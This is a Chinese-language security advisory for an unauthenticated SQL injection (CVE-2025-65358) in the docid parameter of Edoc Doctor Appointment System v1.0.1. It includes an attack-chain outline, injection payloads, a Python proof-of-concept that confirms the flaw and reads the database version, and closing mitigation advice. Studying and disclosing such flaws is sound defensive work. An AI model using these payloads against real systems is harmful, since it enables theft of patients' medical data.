CVE-2025-65358 Edoc医生预约系统SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-65358

漏洞类型

SQL注入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Edoc Doctor Appointment System v1.0.1

漏洞概述

CVE-2025-65358是一个严重的安全漏洞，存在于Edoc医生预约系统v1.0.1版本中。该漏洞是由于系统在处理用户输入时未对'admin/appointment.php'页面中的'docid'参数进行充分的输入验证和过滤，导致攻击者可以通过构造恶意的SQL语句来执行未授权的数据库操作。Edoc医生预约系统是一款用于管理医生预约、患者信息记录和医疗预约流程的Web应用程序，广泛应用于小型诊所和医疗机构的日常运营中。由于该系统处理敏感的医疗数据和患者个人信息，一旦被攻击者利用，将导致严重的机密性、完整性和可用性风险。CVSS评分高达9.8，属于严重级别，攻击复杂度低且无需认证即可实施攻击，这意味着任何能够访问该系统的攻击者都可以轻易利用此漏洞获取数据库中的敏感信息，包括患者个人信息、诊断记录、医生信息等，甚至可能通过SQL注入获取系统管理权限或执行操作系统命令。

技术细节

该SQL注入漏洞位于/admin/appointment.php页面，当系统处理与医生预约相关的请求时，会将用户提供的docid参数直接拼接到SQL查询语句中，而未进行任何预处理或参数化查询。攻击者可以通过在docid参数中注入恶意的SQL代码来修改原始查询的逻辑结构。例如，攻击者可以利用UNION SELECT语句从数据库中提取敏感信息，如管理员账户和密码哈希，或者使用时间盲注技术通过SLEEP()函数来推断数据库内容。在某些配置下，攻击者还可能通过INTO OUTFILE语句将恶意代码写入服务器文件系统，从而实现远程代码执行。由于该漏洞无需任何认证，攻击者可以直接通过HTTP请求访问受影响的端点并注入SQL代码。数据库错误信息可能被回显到页面响应中，这进一步简化了攻击过程，使攻击者能够快速识别数据库类型和结构。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者访问目标网站，识别Edoc医生预约系统的安装路径，特别是定位到/admin/appointment.php端点

STEP 2

步骤2

漏洞识别：攻击者通过在docid参数中注入基本SQL测试语句（如' OR '1'='1）来验证SQL注入漏洞的存在

STEP 3

步骤3

信息收集：利用UNION SELECT语句从数据库中提取系统信息，包括数据库版本、表结构和列名

STEP 4

步骤4

数据窃取：通过构造针对性的SQL查询，攻击者可以提取用户表、管理员账户、密码哈希、患者信息等敏感数据

STEP 5

步骤5

权限提升：在某些配置下，攻击者可能通过SQL注入写入恶意文件到服务器文件系统，从而获取服务器端远程代码执行权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-65358 SQL Injection PoC
# Target: Edoc Doctor Appointment System v1.0.1
# Endpoint: /admin/appointment.php
# Vulnerable Parameter: docid

def test_sql_injection(url):
    """Test for SQL injection vulnerability in docid parameter"""
    target_url = f"{url}/admin/appointment.php"
    
    # Basic boolean-based injection test
    payload_true = "1' AND 1=1 -- -"
    payload_false = "1' AND 1=2 -- -"
    
    print(f"[*] Testing SQL injection on {target_url}")
    print(f"[*] Vulnerable parameter: docid")
    
    # Test true condition
    params = {'docid': payload_true}
    try:
        response = requests.get(target_url, params=params, timeout=10)
        print(f"[+] True condition response length: {len(response.text)}")
        
        # Test false condition
        params['docid'] = payload_false
        response = requests.get(target_url, params=params, timeout=10)
        print(f"[+] False condition response length: {len(response.text)}")
        
        # Union-based injection to extract database info
        union_payload = "1' UNION SELECT 1,2,3,4,5,6,7,8 -- -"
        params['docid'] = union_payload
        response = requests.get(target_url, params=params, timeout=10)
        print(f"[+] Union injection response length: {len(response.text)}")
        
        # Extract database version
        version_payload = "1' UNION SELECT 1,@@version,3,4,5,6,7,8 -- -"
        params['docid'] = version_payload
        response = requests.get(target_url, params=params, timeout=10)
        
        if '5.' in response.text or '8.' in response.text:
            print(f"[!] Database version detected - Vulnerability confirmed!")
            return True
            
    except requests.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False
    
    return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print(f"Usage: python {sys.argv[0]} <target_url>")
        print(f"Example: python {sys.argv[0]} http://target.com")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    test_sql_injection(target)

影响范围

Edoc Doctor Appointment System v1.0.1

防御指南

临时缓解措施

在生产环境中，建议立即采取以下临时缓解措施：1）限制对/admin/appointment.php端点的访问，仅允许受信任的IP地址访问管理后台；2）部署Web应用防火墙规则来检测和阻止包含SQL注入特征的请求；3）对docid参数实施严格的输入验证，拒绝包含单引号、分号、UNION等SQL关键字的输入；4）监控数据库日志，查找异常的SQL查询模式；5）考虑暂时禁用受影响的预约功能，待官方修复发布后再恢复使用。